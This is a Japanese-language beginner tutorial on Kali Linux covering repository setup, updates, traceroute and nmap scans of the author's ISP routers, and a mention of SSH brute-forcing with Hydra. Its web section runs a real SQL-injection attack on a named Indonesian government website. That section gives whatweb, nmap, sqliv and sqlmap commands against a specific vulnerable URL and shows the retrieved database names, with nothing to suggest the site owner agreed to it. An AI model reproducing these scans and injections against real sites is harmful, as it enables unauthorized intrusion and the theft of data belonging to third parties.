KaliLinuxチュートリアル

Kali Linux Tutorial



エキスパートであるか、少なくともLinux、コマンド、および環境に精通していて、マシンにKali Linuxをインストールしたばかりで、KaliLinuxまたはEthicalHackerのマスターになりたい場合は、適切な場所にいます。この記事では、Kaliにまだ慣れていないLinuxユーザー向けのKali Linuxチュートリアルを取り上げ、Kaliの使用中にハッキングやセキュリティテストに使用される基本的なテクニックのいくつかを紹介します。

Kali Linuxとは何ですか?

Kali Linux、( 2013年3月13日に最初にリリースされました )は、セキュリティ会社Offensive Securityによって開発された正式にはBackTrackとして知られており、Debianのテストブランチに基づくフォレンジックでセキュリティに重点を置いたディストリビューションです。 Kali Linuxは、侵入テスト、データリカバリ、脅威検出を念頭に置いて設計されています。プロジェクトは、ディストリビューションのユーザーにより最新のセキュリティユーティリティを提供するために、今年初めにローリングリリースモデルに切り替えました。 Kali Linuxは無料で、いつでも無料です。 600以上の侵入テストツールが含まれています。







なぜKaliLinuxなのか?あなたにぴったりですか?

Kali Linuxは、最近多くの人気を得ています。そして、その背後には理由があります。ハッキングは大衆文化のクールなこととして戻ってきました。これは、TVシリーズのMr.Robotに大きく起因している可能性があります。ロボット氏の人気は、KaliLinuxが新しいユーザーを獲得するのに役立ちました。 Linuxやコンピューターのセキュリティに関連する知識がほとんどない人々は、現在、KaliをメインのLinuxディストリビューションとして使用しようとしています。



これまでで最も高度な侵入テストの配布。 – KaliLinux開発者。 (ページの最上部にあるKali.orgのメインページに書かれています。)その声明から何が得られますか?これに気づきましたか:APTD(高度な侵入テスト配布)?ここには文字通りハッキングという用語はありません。 Kali Linuxは、他のLinuxディストリビューションと同じです。簡単に言うと、これはセキュリティ関連のツールが満載され、ネットワークとコンピュータのセキュリティの専門家を対象としたLinuxディストリビューションです。ただし、Kali Linuxの使用は、セキュリティとフォレンジックにのみ焦点を当てています。



Linuxディストリビューションは、Linuxカーネル、コアユーティリティとアプリケーションのセット、およびいくつかのデフォルト設定を含むバンドルにすぎません。そのため、Kali Linuxは、提供されているツールのほとんどを任意のLinuxディストリビューションにインストールできるという意味で独自の機能を提供していません。





Kali Linuxは、専門的な侵入テストとセキュリティ監査の要件を満たすように特別に調整されています。これは、Linuxユーザーの特定のサブセットを対象としています。ペンテスター、ハッカーなど。開発、Webデザイン、ゲーム、オフィスなどの汎用LinuxデスクトップにKaliを期待している場合は、推奨されるディストリビューションではありません。経験豊富なLinuxユーザーであっても、Kaliはいくつかの課題をもたらす可能性があります。 。

KALILINUXのインストール後に行うこと

Kali Linuxをインストールした後、これを次にどうするか疑問に思うかもしれませんね。誰もがこの問題に直面しています、心配しないでください。



ステップ1:リポジトリを設定する

まず、あなたはすでにこれを知っているかもしれませんが、リポジトリを正しく設定することが重要です。私が言ったように、Kali Linuxローリングリリースモデルは、ディストリビューションのユーザーに最新のセキュリティユーティリティを提供するための取り組みです。通常、Kali Linuxを新たにインストールした場合、リポジトリはインストールに使用しているメディアを参照しています。これを修正するには、リポジトリを公式のKaliLinuxリポジトリに変更する必要があります。必要なファイルは下にあります /etc/apt/sources.list 。リーフパッドテキストエディタでファイルを開き、デフォルトのリポジトリをこの公式のKaliRollingリポジトリに置き換えます。

deb http://http.kali.org/kali kali-rolling main contrib non-free # For source package access, uncomment the following line # deb-src http://http.kali.org/kali kali-rolling main contrib non-free 

ステップ2:KALILINUXを更新およびアップグレードする

システムを更新およびアップグレードした後、KaliLinuxを最新バージョンに同期します。これを行うには、ターミナルを開き、次のように入力します。

apt update -y && apt upgrade -y && apt dist-upgrade 

apt updateコマンドは、リポジトリからパッケージリスト情報をダウンロードしてフェッチし、それらを更新して、パッケージの最新バージョンとその依存関係に関する情報を取得します。

apt upgradeコマンドは、依存関係にエラーがない限り、インストールされているKaliLinuxパッケージのパッケージの新しいバージョンをダウンロードしてインストールします。

apt dist-upgradeは、何があっても、すべてのパッケージを利用可能な最新バージョンに更新します。また、必要に応じて依存関係をインストールおよび削除します(もちろん、パッケージを満たすために依存関係をインストールしますが、更新されたパッケージが依存関係を必要としなくなった場合に孤立した依存関係も削除します。

KALILINUXを使用した基本的な侵入テストの概念

これらの手順を正常に実行した後、対象のシステムに基づいてKaliLinuxで実行できる主なことは次の3つです。

  1. ワイヤレスネットワークのハッキング – Wifiハッキング、フィッシング、ARPポイズニングなど。
  2. Webアプリのハッキング – SQLインジェクション、クロスサイトリクエストフォージェリ(CSRF)、Webフィッシングなど。
  3. デバイスのハッキング –ターゲットマシンを悪用して制御を取得します。

私はIoTハッキングを含めていません。それは、KaliLinuxがその目的のための能力を持っていないという意味ではありません。しかし、文字通り、それはデバイスハッキングにも属している可能性があります。デバイスは物理的な外観と形状を持っているので。このチュートリアルでは、それらの基本的な知識について説明しました。 Kali Linuxは巨大であるため、1つの記事に収まりません。

また、侵入テストのサイクルまたは手順についても知っておく必要があります。彼らです:

  1. 偵察–情報収集
  2. 走査
  3. 手術
  4. エクスプロイト後

KALILINUXを使用したワイヤレスネットワークハッキング

ワイヤレスネットワークのハッキングに関しては、被害者は異なる場合があります。なぜなら、ワイヤレスネットワークは、ISP(インターネットサービスプロバイダー)、ルーターとその仲間(モデム、ハブ、スイッチなど)、クライアント(ユーザー、CCTV、リモートコンピューターなど)など、いくつかのもので構成されているからです。また、脆弱な可能性もあります。

インターネットは、ゲートウェイによって相互に接続された、ネットワークハードウェアの大規模で複雑な集合体です。パケットがたどるルートを追跡することは、特定のホスト名またはターゲットIPアドレスに到達する方法を知るために重要です。

Kali Linuxには、Tracerouteと呼ばれる組み込みツールがあります。 Tracerouteは、IPプロトコルの存続時間フィールドを利用して、あるホストへのパスに沿って各ゲートウェイからICMPTIME_EXCEEDED応答を引き出しようとします。 Tracerouteは、小さいTTL(存続時間)でプローブパケットを起動し、ゲートウェイからのICMP時間を超えた応答をリッスンすることにより、IPパケットがインターネットホストまでたどるルートをトレースしようとします。 Tracerouteを使用して接続を処理するために使用されるISPルーターをトレースする方法の例を示します。

1.認識

情報収集は最も重要なジャンプスタートです。このステップをお見逃しなく。このステップでは、私たちの目的は、私たちが得ることができる可能な限り多くの有用な情報を取得することであり、その後、この情報は次のステップに使用されます。

まず、ターミナルを開き、このコマンドを入力してサイトへの道のトレースを開始します。この場合、サイトをgoogle.comに設定します。

traceroute google.com 

Tracerouteのスクリーンショット

2.スキャン

コマンドを起動すると、パケットが順番に移動する場所が一覧表示されます。上で見ることができるように、私はそれらの1つが私のISPサーバーである3つのホップを得ました。リストの最初のIPは、ゲートウェイとして機能するルーターです。そして次の2つは私のISPに属しています。それでは、Nmapを使用して実行しているサービスを確認しましょう。したがって、スキャンするターゲットは次のとおりです。 10.152.192.110.13.223.102 。ターミナルで次のコマンドを実行しました。

nmap -v -sS [IP Target] -Pn 

コマンドの引数を分解してみましょう。

-v =冗長モードを有効にする

-sS = TCPSYNスキャン技術を使用

-Pn =すべてのホストをオンラインとして扱います—ホストの検出をスキップします

そして、これが私たちが得た結果です。

nmapスクリーンショット2

悲しいことに、すべてのポートが 10.152.192.1 フィルタリングされます。これは、すべての着信TCP接続がこのIP上のIDSまたはファイアウォールによってブロックされていることを意味します。次に、2番目のターゲットに別のスキャンを実行しましょう。

nmapスクリーンショット1

3.操作

この手順では、実際の悪用を行うことを意図していません。代わりに、その方法を示します。上記のNmapスキャン結果に基づいて、このIPではポート22でSSHサーバーが実行されており、開いていることがわかります。野蛮なことは可能です、ハハ!穴が見つかりました。このSSHサーバーは、アクセスを試みる可能性のある穴です。 Kali Linuxには、SSHプロトコルに対するブルートフォース攻撃または辞書攻撃をサポートするツールがいくつかあります。最も人気があり強力なのはHydraです。

わかりました。これは、ターゲットサーバー(この例では私のISPサーバー)に対して侵入テストを実行する基本的な手順でした。

KALILINUXでハッキングするウェブアプリ

実際、これに情熱を注いでいる場合は、DWVA(Damn Vulnerable Web App)をKali Linuxにインストールすることで、ハッキング環境をセットアップできます。これは、脆弱な穴がたくさんあるPHP / MySQLWebアプリケーションです。その主な目標は、セキュリティの専門家が法的な環境でスキルとツールをテストし、Web開発者がWebアプリケーションを保護するプロセスをよりよく理解できるようにすることです。 DWVAはGithubで無料で入手できます: https://github.com/ethicalhack3r/DVWA。

今のところ、実際のサイトでWebアプリのハッキングを行う方法を紹介します。しかし、それは教育目的のみに限定されていることを私に約束してください。 SQLインジェクションを使用して、実際のサイトに対する実際の攻撃をシミュレートします。

前提条件

対象となるツール:

– whatweb(プリインストール済み)

– nmap(プリインストール済み)

– SQLiv(手動でインストール)

– SQLMap(プリインストール)

ここでGithubで利用できるもう1つの追加ツールが必要です:https://github.com/Hadesy2k/sqliv、最初にそれをKaliLinuxにインストールします。特定のドメインを提供することでターゲットスキャンを実行できるSQLivという名前のこのツール(クロールあり)。ターミナルに入力します:

git clone https://github.com/Hadesy2k/sqliv.git cd sqliv && sudo python2 setup.py -i 

ターゲット:www.trenggalekkab.go.id

1.認識

できるだけ多くの有用な情報を収集してください。 Webページを開いて、このサイトで実行されているアプリケーションを検出できます。まず、ウェブサイトの種類を確認しましょう。これを行うには、whatwebを使用します。

whatweb www.trenggalekkab.go.id 

どのWebスクリーンショット

上記の結果を見るとわかるように、ターゲットはインドネシアにあります。実行中です Apache v2.2.27 そのウェブサーバー上にあり、また持っています PHP v5.4.31 、IPアドレスがあります 103.247.21.142 。さて、それをメモしてください。そのWebページにアクセスして、作成されたファイルまたはページ、URLパラメーター、さらにはログインフォームを探す必要がある場合があります。今のところ、スキャンする次のステップのためにそのIPアドレスが必要です。

2.スキャン

以前と同様に、Nmapを再度使用して、ターゲットで実行されているポートとサービスをスキャンします。

nmap -v -sS 103.247.21.142 

そして、これが私たちが得た結果です:

Completed SYN Stealth Scan at 21:22, 261.93s elapsed (1000 total ports) Nmap scan report for ip-103-247-21-142.wifian.net.id (103.247.21.142) Host is up (0.069s latency). Not shown: 985 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 212/tcp open anet 443/tcp open https 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s 3128/tcp filtered squid-http  3306/tcp open mysql  

ターゲット上の各サービスを処理する開いているポートがたくさんありますが、目を引くように見えるのは、ポート3306のmysqlサービスです。このサイトが使用していることが示されています mysql データベース内の情報を管理します。次に、このサイトにSQLインジェクションの脆弱性があるかどうか疑問に思います。そこで、インストールしたばかりのSQLivを使用してサイトを再度スキャンします。コマンドを入力しました:

sqliv -t www.trenggalekkab.go.id 

SQLHacking ScreenShot1

このサイトで2つのSQLの脆弱なURLが見つかりました。それらのURLをメモしてください。

3.操作

わかりました。SQLの脆弱なURLがあり、実行の準備ができています。そのために、SQLMapを使用します。構文は次のとおりです。

sqlmap [Vulnerable URL] --dbs 

コマンドは次のようになります。

 sqlmap -u "http://www.trenggalekkab.go.id/berita.php?page=208" --dbs 

–dbs引数は、ターゲットデータベースを取得するようにSQLMapに指示するためのものです。得られた出力は次のとおりです。

[INFO] the back-end DBMS is MySQL web application technology: PHP 5.4.31, Apache 2.2.27 back-end DBMS: MySQL 5 [21:46:04] [INFO] fetching database names [21:46:04] [INFO] the SQL query used returns 2 entries [21:46:04] [INFO] resumed: information_schema [21:46:04] [INFO] resumed: trengkab_trg available databases [2]: [*] information_schema [*] trengkab_trg 

SQLMapは2つのデータベースを検出しましたが、管理者資格情報アカウントなどの機密データを含むデータベースは1つだけでした。それはtrengkab_trgにあります。データベースを見つけた後、私たちがしなければならないさらに別のステップがあります。それはテーブルと列を見つけることであり、最後のステップはデータをダンプすることです。このセクションでは、このターゲットを使用して、どのように使用するかについては説明しません。少なくとも、攻撃サイクルの基本的な考え方と、いくつかのツールの使用については知っています。

デバイスのハッキング

このサイトの今後の記事では、デバイスのハッキングについて説明しますので、しばらくお待ちください。事前の警告として、このためのPythonを知っていることを確認する必要があります。